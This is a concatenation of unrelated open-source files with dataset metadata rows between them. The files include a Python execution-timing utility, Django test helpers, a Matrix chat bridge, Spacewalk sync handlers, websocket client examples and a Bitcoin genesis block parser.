from os import walk
from os.path import join, getsize
from config_rpm_maker.configuration import get_thread_count
LOGGER = getLogger(__name__)
LOG_EACH_MEASUREMENT = False
_execution_time_summary = {}
def measure_execution_time(original_function):
def process_measurement(elapsed_time_in_seconds, args, kwargs):
arguments = ', '.join([str(arg) for arg in args[1:]])
key_word_arguments = ""
if kwargs:
key_word_arguments = ", " + str(kwargs)
if len(args) > 0:
function_name = "%s.%s" % (args[0].__class__.__name__, original_function.__name__)
else:
function_name = original_function.__name__
if function_name not in _execution_time_summary.keys():
_execution_time_summary[function_name] = [elapsed_time_in_seconds, 1]
else:
_execution_time_summary[function_name][0] += elapsed_time_in_seconds
_execution_time_summary[function_name][1] += 1
if LOG_EACH_MEASUREMENT:
function_call = '%s(%s%s)' % (function_name, arguments, key_word_arguments)
LOGGER.debug('Took %.2fs to perform %s', elapsed_time_in_seconds, function_call)
@wraps(original_function)
def wrapped_function(*args, **kwargs):
start_time = time()
return_value_from_function = original_function(*args, **kwargs)
end_time = time()
elapsed_time_in_seconds = end_time - start_time
process_measurement(elapsed_time_in_seconds, args, kwargs)
return return_value_from_function
return wrapped_function
def log_execution_time_summaries(logging_function):
logging_function('Execution times summary (keep in mind thread_count was set to %s):', get_thread_count())
for function_name in sorted(_execution_time_summary.keys()):
summary_of_function = _execution_time_summary[function_name]
elapsed_time = summary_of_function[0]
average_time = summary_of_function[0] / summary_of_function[1]
logging_function(' %5s times with average %5.2fs = sum %7.2fs : %s',
summary_of_function[1], average_time, elapsed_time, function_name)
def log_directories_summary(logging_function, start_path):
directories_summary = {}
directories = walk(start_path).next()[1]
absolute_count_of_files = 0
absolute_total_size = 0
for file_name in walk(start_path).next()[2]:
file_path = join(start_path, file_name)
file_size = getsize(file_path)
absolute_total_size += file_size
absolute_count_of_files += 1
directories_summary[start_path] = (absolute_count_of_files, absolute_total_size)
for directory in directories:
total_size = 0
count_of_files = 0
directory_path = join(start_path, directory)
for dirpath, dirnames, filenames in walk(directory_path):
for file_name in filenames:
file_path = join(dirpath, file_name)
file_size = getsize(file_path)
total_size += file_size
absolute_total_size += file_size
count_of_files += 1
absolute_count_of_files += 1
directories_summary[directory_path] = (count_of_files, total_size)
logging_function('Found %d files in directory "%s" with a total size of %d bytes', absolute_count_of_files, start_path, absolute_total_size)
for directory in sorted(directories_summary.keys()):
count_of_files = directories_summary[directory][0]
total_size = directories_summary[directory][1]
logging_function(' %5d files with total size of %10d bytes in directory "%s"', count_of_files, total_size, directory)
| gpl-3.0 | 8,090,430,440,642,751,000 | 36.492063 | 144 | 0.657494 | false | 3.834416 | false | false | false |
Ilias95/guitarchords | chords/tests/helper_functions.py | 1 | 1234 | from chords.models import Artist, Song, User
def create_artist(name='Some Artist'):
artist = Artist(name=name)
artist.save()
return artist
def create_song(title='Random Song', artist=None, sender=None, published=True,
tabs=False, genre=None):
song = Song(title=title, artist=artist, sender=sender, tabs=tabs)
if published:
song.publish()
if genre is not None:
song.genre = genre
song.save()
return song
def create_user(username='username', password='password'):
user = User.objects.create_user(username=username, password=password)
user.save()
return user
def valid_song_data(title='Title', artist_txt='artist_txt', user_txt='user_txt',
genre=Song.POP, video='http://www.example.com', tabs=True,
content='content'):
return {
'title' : title, 'artist_txt' : artist_txt, 'user_txt' : user_txt,
'genre' : genre, 'video' : video, 'tabs' : tabs, 'content' : content
}
def valid_contact_data(name='Name', email='example@example.com',
subject='Subject', body='Message'):
return {
'name' : name, 'email' : email,
'subject': subject, 'body' : body
}
| mit | -31,426,872,652,309,664 | 32.351351 | 80 | 0.60778 | false | 3.618768 | false | false | false |
IgnitionProject/ignition | demo/dsl/flame/iterative/CG_inv_generator.py | 1 | 3186 | """Demonstrates how to generate loop invariants from a single PME
In this example, we define the conjugent gradient PME and use it to generate
invariant operators. These operators can then be passed to the flame generator
functions to generate worksheets or algorithms.
"""
from itertools import chain, combinations
import numpy as np
from ignition.dsl.flame import CONSTANTS, iterative_arg, PObj, T, TensorExpr
class InvariantGenerator( object ):
"""Abstract class for generating invariants from PME's.
To use this class, subclass it and create an args tuple and PME.
"""
def _get_tuple_args(self, obj):
ret = obj
if isinstance(obj, (PObj, list)):
ret = []
obj_list = list(obj)
for item in obj_list:
ret.append(self._get_tuple_args(item))
ret = tuple(ret)
elif isinstance(obj, TensorExpr):
if obj in CONSTANTS:
# We throw away constants since they don't need a new name
ret = "_"
else:
ret = obj
else:
raise ValueError("Unable to handle obj %s of type %s" % \
(str(obj), type(obj)))
return ret
def _get_signature(self, fname):
return "def %(fname)s(%(fargs)s):" % \
{'fname': fname,
'fargs': ", ".join(map(lambda o: str(self._get_tuple_args(o)),
self.args)).replace("'", ""),
}
def _get_body(self, inv):
return " return " + str(inv)
def __iter__(self):
size = len(self.PME)
for n, comb in enumerate(chain(*[combinations(range(size), i) \
for i in xrange(1, size+1)])):
invs = [self.PME[idx] for idx in comb]
code = self._get_signature(self.name+"_"+str(n))
code += '\n'
code += self._get_body( invs )
yield code
class CGInvariantGenerator( InvariantGenerator ):
A = iterative_arg("A", rank=2, part_suffix="1x1")
X = iterative_arg("X", rank=2, part_suffix="1x3", arg_src="Overwrite")
P = iterative_arg("P", rank=2, part_suffix="1x3", arg_src="Computed")
I = iterative_arg("I", rank=2, part_suffix="I_3x3", arg_src="Computed")
U = iterative_arg("U", rank=2, part_suffix="Upper_Bidiag_3x3", arg_src="Computed")
J = iterative_arg("J", rank=2, part_suffix="J_3x3", arg_src="Computed")
D = iterative_arg("D", rank=2, part_suffix="Diag_3x3", arg_src="Computed")
R = iterative_arg("R", rank=2, part_suffix="1x3", arg_src="Computed")
O = iterative_arg("O", rank=2, part_suffix="1x3", arg_src="Computed")
args = [A, X, P, I, U, J, D, R, O]
#Putting this here until I get PObjs combining better
for arg in args:
exec('%(name)s = np.matrix(%(name)s.part)' % {'name': arg.obj.name})
PME = [X * (I + U) - P * D,
A * P * D - R * (I - U),
P * (I - J) - R,
T(R) * R - O]
name = 'cg_inv'
if __name__ == "__main__":
with open("cg_inv.py", 'w') as fp:
for code in CGInvariantGenerator():
fp.write(code+"\n\n")
| bsd-3-clause | -2,550,230,135,679,058,000 | 35.204545 | 86 | 0.548023 | false | 3.375 | false | false | false |
kokjo/pycoin | genesisblock.py | 1 | 1579 | import msgs
blkmsg = msgs.Blockmsg.fromjson({"type": "block", "txs": [{"inputs": [{"script": "04ffff001d0104455468652054696d65732030332f4a616e2f32303039204368616e63656c6c6f72206f6e206272696e6b206f66207365636f6e64206261696c6f757420666f722062616e6b73", "outpoint": {"index": 4294967295, "tx": "0000000000000000000000000000000000000000000000000000000000000000"}, "sequence": 4294967295}], "locktime": 0, "version": 1, "outputs": [{"amount": 5000000000, "script": "4104678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5fac"}]}], "block": {"nonce": 2083236893, "version": 1, "time": 1231006505, "merkle": "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127b7afdeda33b", "bits": 0x1d00ffff, "prev": "0000000000000000000000000000000000000000000000000000000000000000"}})
hash = blkmsg.block.hash
blkdata = "".join([
"010000000000000000000000000000000000000000000000000000000000000000000000",
"3ba3edfd7a7b12b27ac72c3e67768f617fc81bc3888a51323a9fb8aa4b1e5e4a29ab5f49",
"ffff001d1dac2b7c01010000000100000000000000000000000000000000000000000000",
"00000000000000000000ffffffff4d04ffff001d0104455468652054696d65732030332f",
"4a616e2f32303039204368616e63656c6c6f72206f6e206272696e6b206f66207365636f",
"6e64206261696c6f757420666f722062616e6b73ffffffff0100f2052a01000000434104",
"678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f",
"4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5fac00000000"])
blkmsg = msgs.Blockmsg.frombinary(blkdata.decode("hex"))[0]
hash = blkmsg.block.hash
| unlicense | 9,101,266,588,675,411,000 | 91.882353 | 830 | 0.860671 | false | 2.471049 | false | true | false |
tuna/fishroom | fishroom/matrix.py | 2 | 7312 | #!/usr/bin/env python3
from matrix_client.client import MatrixClient
from matrix_client.api import MatrixRequestError
from requests.exceptions import MissingSchema
from .bus import MessageBus, MsgDirection
from .base import BaseBotInstance, EmptyBot
from .models import Message, ChannelType, MessageType
from .helpers import get_now_date_time, get_logger
from .config import config
import sys
import re
logger = get_logger("Matrix")
class MatrixHandle(BaseBotInstance):
ChanTag = ChannelType.Matrix
SupportMultiline = True
def __init__(self, server, username, password, rooms, nick=None):
client = MatrixClient(server)
self.viewer_url = server.strip('/') + "/_matrix/media/v1/download/"
try:
client.login_with_password(username, password)
except MatrixRequestError as e:
if e.code == 403:
logger.error("403 Bad username or password.")
sys.exit(4)
else:
logger.error("{} Check your server details are correct.".format(e))
sys.exit(2)
except MissingSchema as e:
logger.error("{} Bad URL format.".format(e))
sys.exit(3)
self.username = client.user_id
logger.info("logged in as: {}".format(self.username))
if nick is not None:
u = client.get_user(client.user_id)
logger.info("Setting display name to {}".format(nick))
try:
u.set_display_name(nick)
except MatrixRequestError as e:
logger.error("Fail to set display name: error = {}".format(e))
self.joined_rooms = {}
self.room_id_to_alias = {}
self.displaynames = {}
for room_id_alias in rooms:
try:
room = client.join_room(room_id_alias)
except MatrixRequestError as e:
if e.code == 400:
logger.error("400 Room ID/Alias in the wrong format")
sys.exit(11)
else:
logger.error("{} Couldn't find room {}".format(e, room_id_alias))
sys.exit(12)
logger.info("Joined room {}".format(room_id_alias))
self.joined_rooms[room_id_alias] = room
self.room_id_to_alias[room.room_id] = room_id_alias
room.add_listener(self.on_message)
self.client = client
self.bot_msg_pattern = config['matrix'].get('bot_msg_pattern', None)
def on_message(self, room, event):
if event['sender'] == self.username:
return
logger.info("event received, type: {}".format(event['type']))
if event['type'] == "m.room.member":
if event['content']['membership'] == "join":
logger.info("{0} joined".format(event['content']['displayname']))
elif event['type'] == "m.room.message":
sender = event['sender']
opt = {'matrix': sender}
if sender not in self.displaynames.keys():
u_send = self.client.get_user(sender)
self.displaynames[sender] = u_send.get_display_name()
sender = self.displaynames[sender]
msgtype = event['content']['msgtype']
room_alias = self.room_id_to_alias[room.room_id]
date, time = get_now_date_time()
mtype = None
media_url = None
typedict = {
"m.image": MessageType.Photo,
"m.audio": MessageType.Audio,
"m.video": MessageType.Video,
"m.file": MessageType.File
}
if msgtype == "m.text" or msgtype == "m.notice":
mtype = MessageType.Text
msg_content = event['content']['body']
elif msgtype == "m.emote":
mtype = MessageType.Text
msg_content = "*{}* {}".format(sender, event['content']['body'])
elif msgtype in ["m.image", "m.audio", "m.video", "m.file"]:
new_url = event['content']['url'].replace("mxc://", self.viewer_url)
mtype = typedict[msgtype]
msg_content = "{} ({})\n{}".format(new_url, mtype, event['content']['body'])
media_url = new_url
else:
pass
logger.info("[{}] {}: {}".format(room_alias, sender, event['content']['body']))
if mtype is not None:
msg = Message(
ChannelType.Matrix,
sender, room_alias, msg_content,
mtype=mtype, date=date, time=time,
media_url=media_url, opt=opt)
self.send_to_bus(self, msg)
def send_to_bus(self, msg):
raise NotImplementedError()
def listen_message_stream(self):
self.client.start_listener_thread()
def send_msg(self, target, content, sender=None, first=False, **kwargs):
target_room = self.joined_rooms[target]
if self.bot_msg_pattern is not None and re.match(self.bot_msg_pattern, content) is not None:
target_room.send_text("{} sent the following message:".format(sender))
target_room.send_text(content)
else:
target_room.send_text("[{}] {}".format(sender, content))
def Matrix2FishroomThread(mx: MatrixHandle, bus: MessageBus):
if mx is None or isinstance(mx, EmptyBot):
return
def send_to_bus(self, msg):
bus.publish(msg)
mx.send_to_bus = send_to_bus
mx.listen_message_stream()
def Fishroom2MatrixThread(mx: MatrixHandle, bus: MessageBus):
if mx is None or isinstance(mx, EmptyBot):
return
for msg in bus.message_stream():
mx.forward_msg_from_fishroom(msg)
def init():
from .db import get_redis
redis_client = get_redis()
im2fish_bus = MessageBus(redis_client, MsgDirection.im2fish)
fish2im_bus = MessageBus(redis_client, MsgDirection.fish2im)
rooms = [b["matrix"] for _, b in config['bindings'].items() if "matrix" in b]
server = config['matrix']['server']
user = config['matrix']['user']
password = config['matrix']['password']
nick = config['matrix'].get('nick', None)
return (
MatrixHandle(server, user, password, rooms, nick),
im2fish_bus, fish2im_bus,
)
def main():
if "matrix" not in config:
return
from .runner import run_threads
bot, im2fish_bus, fish2im_bus = init()
run_threads([
(Matrix2FishroomThread, (bot, im2fish_bus, ), ),
(Fishroom2MatrixThread, (bot, fish2im_bus, ), ),
])
def test():
rooms = [b["matrix"] for _, b in config['bindings'].items()]
server = config['matrix']['server']
user = config['matrix']['user']
password = config['matrix']['password']
matrix_handle = MatrixHandle(server, user, password, rooms)
def send_to_bus(self, msg):
logger.info(msg.dumps())
matrix_handle.send_to_bus = send_to_bus
matrix_handle.process(block=True)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--test", default=False, action="store_true")
args = parser.parse_args()
if args.test:
test()
else:
main()
# vim: ts=4 sw=4 sts=4 expandtab
| gpl-3.0 | 8,994,990,554,163,678,000 | 34.495146 | 100 | 0.569748 | false | 3.876988 | true | false | false |
ogajduse/spacewalk | backend/satellite_tools/sync_handlers.py | 10 | 18900 | #
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import sys
import string # pylint: disable=W0402
from spacewalk.common import usix
from spacewalk.server.importlib import channelImport, packageImport, errataImport, \
kickstartImport
from spacewalk.common.usix import raise_with_tb
import diskImportLib
import xmlSource
import syncCache
import syncLib
DEFAULT_ORG = 1
# Singleton-like
class BaseCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._items = []
self._cache = None
self._items_hash = {}
self._init_fields()
self._init_cache()
def add_item(self, item):
item_id = self._get_item_id(item)
timestamp = self._get_item_timestamp(item)
self._cache.cache_set(item_id, item, timestamp=timestamp)
return self
def get_item_timestamp(self, item_id):
"Returns this item's timestamp"
if item_id not in self._items_hash:
raise KeyError("Item %s not found in collection" % item_id)
return self._items_hash[item_id]
def get_item(self, item_id, timestamp):
"Retrieve an item from the collection"
return self._cache.cache_get(item_id, timestamp=timestamp)
def has_item(self, item_id, timestamp):
"""Return true if the item exists in the collection (with the
specified timestamp"""
return self._cache.cache_has_key(item_id, timestamp=timestamp)
def _init_fields(self):
return self
def _init_cache(self):
return self
def _get_item_id(self, item):
"Get the item ID out of an item. Override in subclasses"
raise NotImplementedError
def _get_item_timestamp(self, item):
"Get the item timestamp out of an item. Override in subclasses"
raise NotImplementedError
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
# Singleton-like
class ChannelCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._channels = []
self._parent_channels = {}
self._channels_hash = {}
self._cache = syncCache.ChannelCache()
def add_item(self, channel_object):
"""Stores a channel in the collection"""
channel_label = channel_object['label']
channel_last_modified = channel_object['last_modified']
last_modified = _to_timestamp(channel_last_modified)
self._cache.cache_set(channel_label, channel_object,
timestamp=last_modified)
t = (channel_label, last_modified)
self._channels.append(t)
channel_parent = channel_object.get('parent_channel')
if channel_parent is not None:
# Add this channel to the parent's list
l = self._get_list_from_dict(self._parent_channels, channel_parent)
l.append(t)
else:
# Create an empty list
self._get_list_from_dict(self._parent_channels, channel_label)
self._channels_hash[channel_label] = last_modified
return self
@staticmethod
def _get_list_from_dict(diction, key):
# Returns the dictionary's key if present (assumed to be a list), or
# sets the value to an empty list and returns it
if key in diction:
l = diction[key]
else:
l = diction[key] = []
return l
def get_channel_labels(self):
"""Return the channel labels from this collection"""
return [x[0] for x in self._channels]
def get_channels(self):
"""Return a list of (channel label, channel timestamp) from this
collection"""
return self._channels[:]
def get_channel(self, channel_label, timestamp):
"""Return the channel with the specified label and timestamp from the
collection"""
return self._cache.cache_get(channel_label, timestamp=timestamp)
def get_channel_timestamp(self, channel_label):
"""Returns the channel's timestamp"""
if channel_label not in self._channels_hash:
raise KeyError("Channel %s could not be found" % channel_label)
return self._channels_hash[channel_label]
def get_parent_channel_labels(self):
"""Return a list of channel labels for parent channels"""
l = list(self._parent_channels.keys())
l.sort()
return l
def get_child_channels(self, channel_label):
"""Return a list of (channel label, channel timestamp) for this parent
channel"""
if channel_label not in self._parent_channels:
raise Exception("Channel %s is not a parent" % channel_label)
return self._parent_channels[channel_label]
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
# pylint: disable=W0232
class SyncHandlerContainer:
collection = object
# this class has no __init__ for the purpose
# it's used in multiple inheritance mode and inherited classes should
# use __init__ from the other base class
def endItemCallback(self):
# reference to xmlSource superclass we redefines
xml_superclass = self.__class__.__bases__[1]
xml_superclass.endItemCallback(self)
# pylint: disable=E1101
if not self.batch:
return
c = self.collection()
c.add_item(self.batch[-1])
del self.batch[:]
def endContainerCallback(self):
# Not much to do here...
pass
def get_sync_handler(container):
handler = xmlSource.SatelliteDispatchHandler()
handler.set_container(container)
return handler
class ChannelContainer(SyncHandlerContainer, xmlSource.ChannelContainer):
collection = ChannelCollection
def get_channel_handler():
return get_sync_handler(ChannelContainer())
def import_channels(channels, orgid=None, master=None):
collection = ChannelCollection()
batch = []
org_map = None
my_backend = diskImportLib.get_backend()
if master:
org_map = my_backend.lookupOrgMap(master)['master-id-to-local-id']
for c in channels:
try:
timestamp = collection.get_channel_timestamp(c)
except KeyError:
raise_with_tb(Exception("Could not find channel %s" % c), sys.exc_info()[2])
c_obj = collection.get_channel(c, timestamp)
if c_obj is None:
raise Exception("Channel not found in cache: %s" % c)
# Check to see if we're asked to sync to an orgid,
# make sure the org from the export is not null org,
# finally if the orgs differ so we might wanna use
# requested org's channel-family.
# TODO: Move these checks somewhere more appropriate
if not orgid and c_obj['org_id'] is not None:
# If the src org is not present default to org 1
orgid = DEFAULT_ORG
if orgid is not None and c_obj['org_id'] is not None and \
c_obj['org_id'] != orgid:
# If we know the master this is coming from and the master org
# has been mapped to a local org, transform org_id to the local
# org_id. Otherwise just put it in the default org.
if (org_map and c_obj['org_id'] in list(org_map.keys())
and org_map[c_obj['org_id']]):
c_obj['org_id'] = org_map[c_obj['org_id']]
else:
c_obj['org_id'] = orgid
if c_obj.has_key('trust_list'):
del(c_obj['trust_list'])
for family in c_obj['families']:
family['label'] = 'private-channel-family-' + \
str(c_obj['org_id'])
# If there's a trust list on the channel, transform the org ids to
# the local ones
if c_obj.has_key('trust_list') and c_obj['trust_list']:
trusts = []
for trust in c_obj['trust_list']:
if trust['org_trust_id'] in org_map:
trust['org_trust_id'] = org_map[trust['org_trust_id']]
trusts.append(trust)
c_obj['trust_list'] = trusts
syncLib.log(6, "Syncing Channel %s to Org %s " % (c_obj['label'], c_obj['org_id']))
batch.append(c_obj)
importer = channelImport.ChannelImport(batch, my_backend)
# Don't commit just yet
importer.will_commit = 0
importer.run()
return importer
# Singleton-like
class ShortPackageCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._cache = None
self._init_cache()
def _init_cache(self):
self._cache = syncCache.ShortPackageCache()
def add_item(self, package):
"""Stores a package in the collection"""
self._cache.cache_set(package['package_id'], package)
def get_package(self, package_id):
"""Return the package with the specified id from the collection"""
return self._cache.cache_get(package_id)
def has_package(self, package_id):
"""Returns true if the package exists in the collection"""
return self._cache.cache_has_key(package_id)
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
class ShortPackageContainer(SyncHandlerContainer, xmlSource.IncompletePackageContainer):
collection = ShortPackageCollection
def get_short_package_handler():
return get_sync_handler(ShortPackageContainer())
class PackageCollection(ShortPackageCollection):
_shared_state = {}
def _init_cache(self):
self._cache = syncCache.PackageCache()
def get_package_timestamp(self, package_id):
raise NotImplementedError
class PackageContainer(SyncHandlerContainer, xmlSource.PackageContainer):
collection = PackageCollection
def get_package_handler():
return get_sync_handler(PackageContainer())
# Singleton-like
class SourcePackageCollection(ShortPackageCollection):
_shared_state = {}
def _init_cache(self):
self._cache = syncCache.SourcePackageCache()
class SourcePackageContainer(SyncHandlerContainer, xmlSource.SourcePackageContainer):
collection = SourcePackageCollection
def get_source_package_handler():
return get_sync_handler(SourcePackageContainer())
# Singleton-like
class ErrataCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._errata_hash = {}
self._cache = None
self._init_cache()
def _init_cache(self):
self._cache = syncCache.ErratumCache()
def add_item(self, erratum):
"""Stores an erratum in the collection"""
erratum_id = erratum['erratum_id']
timestamp = _to_timestamp(erratum['last_modified'])
self._errata_hash[erratum_id] = timestamp
self._cache.cache_set(erratum_id, erratum, timestamp=timestamp)
def get_erratum_timestamp(self, erratum_id):
"""Returns the erratum's timestamp"""
if erratum_id not in self._errata_hash:
raise KeyError("Erratum %s could not be found" % erratum_id)
return self._errata_hash[erratum_id]
def get_erratum(self, erratum_id, timestamp):
"""Return the erratum with the specified id and timestamp from the
collection. Note that timestamp can be None, in which case no timetamp
matching is performed"""
return self._cache.cache_get(erratum_id, timestamp=timestamp)
def has_erratum(self, erratum_id, timestamp):
"""Returns true if the erratum exists in the collection"""
return self._cache.cache_has_key(erratum_id, timestamp=timestamp)
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
class ErrataContainer(SyncHandlerContainer, xmlSource.ErrataContainer):
collection = ErrataCollection
def get_errata_handler():
return get_sync_handler(ErrataContainer())
class KickstartableTreesCollection(BaseCollection):
_shared_state = {}
def _init_cache(self):
self._cache = syncCache.KickstartableTreesCache()
def _get_item_id(self, item):
return item['label']
def _get_item_timestamp(self, item):
return None
class KickstartableTreesContainer(SyncHandlerContainer, xmlSource.KickstartableTreesContainer):
collection = KickstartableTreesCollection
def get_kickstarts_handler():
return get_sync_handler(KickstartableTreesContainer())
def import_packages(batch, sources=0):
importer = packageImport.PackageImport(batch, diskImportLib.get_backend(), sources)
importer.setUploadForce(4)
importer.run()
importer.status()
return importer
def link_channel_packages(batch, strict=1):
importer = packageImport.ChannelPackageSubscription(batch,
diskImportLib.get_backend(),
caller="satsync.linkPackagesToChannels", strict=strict)
importer.run()
importer.status()
return importer
def import_errata(batch):
importer = errataImport.ErrataImport(batch, diskImportLib.get_backend())
importer.ignoreMissing = 1
importer.run()
importer.status()
return importer
def import_kickstarts(batch):
importer = kickstartImport.KickstartableTreeImport(batch,
diskImportLib.get_backend())
importer.run()
importer.status()
return importer
def _to_timestamp(t):
if isinstance(t, usix.IntType):
# Already an int
return t
# last_modified is YYYY-MM-DD HH24:MI:SS
# The cache expects YYYYMMDDHH24MISS as format; so just drop the
# spaces, dashes and columns
# python 2.4 can't handle t.translate(None, ' -:')
last_modified = t.translate(string.maketrans("", ""), ' -:')
return last_modified
# Generic container handler
class ContainerHandler:
"""generate and set container XML handlers"""
def __init__(self, master_label, create_orgs=False):
self.handler = xmlSource.SatelliteDispatchHandler()
# arch containers
self.setServerArchContainer()
self.setPackageArchContainer()
self.setChannelArchContainer()
self.setCPUArchContainer()
self.setServerPackageArchContainer()
self.setServerChannelArchContainer()
self.setServerGroupServerArchContainer()
self.setChannelPackageArchContainer()
# all other containers
self.setChannelFamilyContainer()
self.setProductNamesContainer()
self.setOrgContainer(master_label, create_orgs)
def __del__(self):
self.handler.close() # kill the circular reference.
def close(self):
self.handler.close() # kill the circular reference.
def clear(self):
self.handler.clear() # clear the batch
# basic functionality:
def process(self, stream):
self.handler.process(stream)
def reset(self):
self.handler.reset()
def getHandler(self):
return self.handler
# set arch containers:
def setServerArchContainer(self):
self.handler.set_container(diskImportLib.ServerArchContainer())
def setPackageArchContainer(self):
self.handler.set_container(diskImportLib.PackageArchContainer())
def setChannelArchContainer(self):
self.handler.set_container(diskImportLib.ChannelArchContainer())
def setCPUArchContainer(self):
self.handler.set_container(diskImportLib.CPUArchContainer())
def setServerPackageArchContainer(self):
self.handler.set_container(diskImportLib.ServerPackageArchCompatContainer())
def setServerChannelArchContainer(self):
self.handler.set_container(diskImportLib.ServerChannelArchCompatContainer())
def setServerGroupServerArchContainer(self):
self.handler.set_container(diskImportLib.ServerGroupServerArchCompatContainer())
def setChannelPackageArchContainer(self):
self.handler.set_container(ChannelPackageArchCompatContainer())
# set all other containers:
def setChannelFamilyContainer(self):
self.handler.set_container(ChannelFamilyContainer())
def setProductNamesContainer(self):
self.handler.set_container(diskImportLib.ProductNamesContainer())
def setOrgContainer(self, master_label, create_orgs):
# pylint: disable=E1101,E1103
self.handler.set_container(diskImportLib.OrgContainer())
self.handler.get_container('rhn-orgs').set_master_and_create_org_args(
master_label, create_orgs)
#
# more containers
#
# NOTE: we use *most* the Arch Containers from diskImportLib.py
# this one is used simply to print out the arches.
class ChannelPackageArchCompatContainer(diskImportLib.ChannelPackageArchCompatContainer):
arches = {}
def endItemCallback(self):
diskImportLib.ChannelPackageArchCompatContainer.endItemCallback(self)
if not self.batch:
return
self.arches[self.batch[-1]['package-arch']] = 1
def endContainerCallback(self):
arches = list(self.arches.keys())
arches.sort()
if arches:
for arch in arches:
syncLib.log(6, ' parsed arch: %s' % (arch))
diskImportLib.ChannelPackageArchCompatContainer.endContainerCallback(self)
class ChannelFamilyContainer(xmlSource.ChannelFamilyContainer):
def endItemCallback(self):
xmlSource.ChannelFamilyContainer.endItemCallback(self)
if not self.batch:
return
syncLib.log(2, ' parsing family: %s' % (self.batch[-1]['name']))
def endContainerCallback(self):
batch = self.batch
# use the copy only; don't want a persistent self.batch
self.batch = []
importer = channelImport.ChannelFamilyImport(batch,
diskImportLib.get_backend())
importer.run()
| gpl-2.0 | -8,960,262,656,581,139,000 | 31.698962 | 111 | 0.644868 | false | 4.07943 | false | false | false |
OptimalBPM/WebSocket-for-Python | example/bug167_client.py | 5 | 1625 | def run_threaded():
from ws4py.client.threadedclient import WebSocketClient
class EchoClient(WebSocketClient):
def opened(self):
self.send("hello")
def closed(self, code, reason=None):
print(("Closed down", code, reason))
def received_message(self, m):
print(m)
self.close()
try:
ws = EchoClient('wss://localhost:9000/ws')
ws.connect()
ws.run_forever()
except KeyboardInterrupt:
ws.close()
def run_tornado():
from tornado import ioloop
from ws4py.client.tornadoclient import TornadoWebSocketClient
class MyClient(TornadoWebSocketClient):
def opened(self):
self.send("hello")
def closed(self, code, reason=None):
print(("Closed down", code, reason))
ioloop.IOLoop.instance().stop()
def received_message(self, m):
print(m)
self.close()
ws = MyClient('wss://localhost:9000/ws')
ws.connect()
ioloop.IOLoop.instance().start()
def run_gevent():
from gevent import monkey; monkey.patch_all()
import gevent
from ws4py.client.geventclient import WebSocketClient
ws = WebSocketClient('wss://localhost:9000/ws')
ws.connect()
ws.send("hello")
def incoming():
while True:
m = ws.receive()
if m is not None:
print(m)
else:
break
ws.close()
gevent.joinall([gevent.spawn(incoming)])
#run_gevent()
run_threaded()
run_tornado()
| bsd-3-clause | 2,127,205,877,635,809,500 | 24 | 65 | 0.561231 | false | 4.145408 | false | false | false |
aneumeier/stocks | portfolio/migrations/0001_initial.py | 2 | 1885 | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
def initial_data(apps, schema_editor):
Symbol = apps.get_model('portfolio', 'Symbol')
return
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Symbol',
fields=[
(
'id',
models.AutoField(
verbose_name='ID',
serialize=False,
auto_created=True,
primary_key=True)
),
('name', models.CharField(max_length=32)),
('slug', models.SlugField(default="")),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Quote',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('symbol', models.ForeignKey(to='portfolio.Symbol', to_field='id')),
('date', models.DateField()),
('adj_close', models.DecimalField(max_digits=32, decimal_places=30)),
('closed', models.DecimalField(max_digits=32, decimal_places=30)),
('high', models.DecimalField(max_digits=32, decimal_places=30)),
('low', models.DecimalField(max_digits=32, decimal_places=30)),
('opened', models.DecimalField(max_digits=32, decimal_places=30)),
('volume', models.DecimalField(max_digits=32, decimal_places=30)),
],
options={
'unique_together': set([(b'symbol', b'date')]),
},
bases=(models.Model,),
),
migrations.RunPython(initial_data),
]
| agpl-3.0 | -5,571,421,897,167,403,000 | 34.566038 | 114 | 0.501326 | false | 4.642857 | false | false | false |
ARM-software/bob-build | tests/output/verify.py | 1 | 1459 | #!/bin/env python
# Copyright 2019 Arm Limited.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import sys
import os
import platform
parser = argparse.ArgumentParser(description='Test generator.')
parser.add_argument('--out')
parser.add_argument('--expected')
group = parser.add_mutually_exclusive_group()
group.add_argument('--shared', help='use .so or .dylib extension', action='store_true')
group.add_argument('--static', help='use .a extension', action='store_true')
args = parser.parse_args()
if args.shared:
if platform.system() == 'Darwin':
extension = '.dylib'
else:
extension = '.so'
elif args.static:
extension = '.a'
else:
